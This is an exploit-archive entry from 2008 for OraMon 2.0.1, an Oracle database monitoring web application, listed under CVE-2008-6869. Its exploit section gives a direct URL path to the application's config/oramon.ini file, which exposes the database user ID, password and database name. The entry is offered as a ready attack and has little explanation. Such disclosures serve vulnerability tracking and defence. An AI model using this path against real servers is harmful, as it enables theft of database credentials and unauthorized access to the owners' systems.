OraMon 2.0.1 - Remote Configuration File Disclosure
Author: ahmadbady
type: webapps
platform: php
port:
date_added: 2008-11-28
date_updated:
verified: 1
codes: OSVDB-56419;CVE-2008-6869
tags:
aliases:
screenshot_url:
application_url:
........................
..............................................
+++++Bypass Config Download Vulnerability+++++
...............................................
script:Oramon = Oracle Database Monitoring
++++++++++++++++++++++++++++++++++++++++++++++++++++++++
download:http://www.oramon.org/downloads/oramon.tar.gz
++++++++++++++++++++++++++++++++++++++++++++++++++++++++
expl:
$USERID=
$PASSWORD=
$DATABASE=
www.site.com/path/config/oramon.ini
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
| | | | | |
Author: ahmadbady
| | | | | |
my mail: kivi_hacker666@yahoo.com | | | | | |
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# milw0rm.com [2008-11-29]